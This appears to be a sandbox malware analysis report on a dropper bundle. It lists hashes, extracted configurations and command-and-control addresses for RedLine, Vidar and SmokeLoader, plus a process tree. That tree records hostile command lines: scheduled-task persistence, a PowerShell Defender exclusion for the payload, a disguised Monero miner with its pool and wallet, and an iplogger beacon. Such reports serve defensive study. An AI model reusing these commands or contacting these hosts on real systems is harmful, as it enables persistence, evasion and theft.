Analysis
max time kernel: 0s
max time network: 106s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31-12-2023 03:59
Static task: static1
Behavioral task: behavioral1
Sample: 2737e2cab1e399c563fe0557683234fd.exe
Resource: win7-20231215-en
General
Target: 2737e2cab1e399c563fe0557683234fd.exe
Size: 3.9MB
MD5: 2737e2cab1e399c563fe0557683234fd
SHA1: a78fdf21a20d386622a448909c4c3d8a527e3102
SHA256: f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2
SHA512: 3e58d11e6a87bb5f52e674b998672e9d3d8b165275e8818733a2da1043279a9c4109aa7ad51bb74de9984d360e7f277f92653f50e2088c66cb0b6552901a6dff
SSDEEP: 98304:yFdkFKkhdtRHWG5yuIEjf9kDQQXItcd0u3uOZKGo:yFRkHLJhBFoXItcd008
Malware Config
Extracted: nullmixer
  http://marisana.xyz/
Extracted: vidar
  40
  706
  https://lenak513.tumblr.com/
  profile_id: 706
Extracted: smokeloader
  pub6
Extracted: redline
  Build1
  45.142.213.135:30058
Signatures
PrivateLoader
  PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload (1 IoC)
  resource | yara_rule
  behavioral2/memory/4120-211-0x0000000000400000-0x000000000041E000-memory.dmp | family_redline
SectopRAT payload (1 IoC)
  resource | yara_rule
  behavioral2/memory/4120-211-0x0000000000400000-0x000000000041E000-memory.dmp | family_sectoprat
SmokeLoader
  Modular backdoor trojan in use since 2014.
Vidar Stealer (2 IoCs)
  resource | yara_rule
  behavioral2/memory/1032-158-0x0000000000400000-0x000000000334B000-memory.dmp | family_vidar
  behavioral2/memory/1032-135-0x0000000003420000-0x00000000034BD000-memory.dmp | family_vidar
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libstdc++-6.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurlpp.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\libcurl.dll | aspack_v212_v242
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  15 | ipinfo.io
  16 | ipinfo.io
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
  pid | pid_target | process | target process
  1224 | 2544 | WerFault.exe | setup_install.exe
Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | process
  4384 | schtasks.exe
  4868 | schtasks.exe
Processes
PID | image | command line (each entry indented by its nesting depth in the process tree)
PID 448 | C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe | "C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"
  PID 1296 | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    PID 2544 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe | "C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\setup_install.exe"
      PID 1888 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe
        PID 2220 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\45523e3cdecd50c9.exe | 45523e3cdecd50c9.exe
      PID 1404 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe
        PID 4368 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cc8d5bf9d8.exe | cc8d5bf9d8.exe
      PID 4384 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 52748077bb26.exe
        PID 2784 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\52748077bb26.exe | 52748077bb26.exe
      PID 1224 | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 556 | signature: Program crash
      PID 1528 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c dc8baab07.exe
      PID 4092 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe
      PID 1700 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe
      PID 3364 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe
      PID 1960 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c 0c879100232.exe
      PID 3672 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe
PID 4408 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\0c879100232.exe | 0c879100232.exe
PID 848 | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2544 -ip 2544
PID 4940 | C:\Windows\winnetdriv.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167719 0
PID 3716 | C:\Users\Admin\AppData\Local\Temp\setup.exe | "C:\Users\Admin\AppData\Local\Temp\setup.exe"
PID 3476 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe | "C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe" -a
PID 3856 | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
  PID 4232 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
  PID 3956 | C:\Users\Admin\AppData\Roaming\services64.exe | "C:\Users\Admin\AppData\Roaming\services64.exe"
    PID 2820 | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    PID 5108 | C:\Windows\System32\cmd.exe | "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    PID 3752 | C:\Windows\explorer.exe | C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
PID 4896 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
  PID 4120 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
  PID 1060 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
PID 4260 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\23cfc2c69e2b5.exe | 23cfc2c69e2b5.exe
PID 4596 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\cfbebc6111c611.exe | cfbebc6111c611.exe
  PID 5044 | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
PID 3144 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\f35fb6370e5673.exe | f35fb6370e5673.exe
PID 1032 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\227af833e4e9ad4.exe | 227af833e4e9ad4.exe
PID 396 | C:\Users\Admin\AppData\Local\Temp\7zS015D9D57\dc8baab07.exe | dc8baab07.exe
PID 4384 | C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' | signature: Creates scheduled task(s)
PID 2992 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS1807.tmp\Install.cmd" "
  PID 4336 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
    PID 4880 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb469e46f8,0x7ffb469e4708,0x7ffb469e4718
    PID 4864 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
    PID 4312 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
    PID 4640 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
    PID 536 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
    PID 4500 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
    PID 1572 | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
    PID 4748 | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
    PID 2924 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
    PID 3092 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
    PID 2440 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
    PID 2948 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14268065565239611010,16345434479952773,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
PID 3284 | C:\Windows\System32\CompPkgSrv.exe | C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 1736 | C:\Windows\System32\CompPkgSrv.exe | C:\Windows\System32\CompPkgSrv.exe -Embedding
PID 4868 | C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' | signature: Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v15
Downloads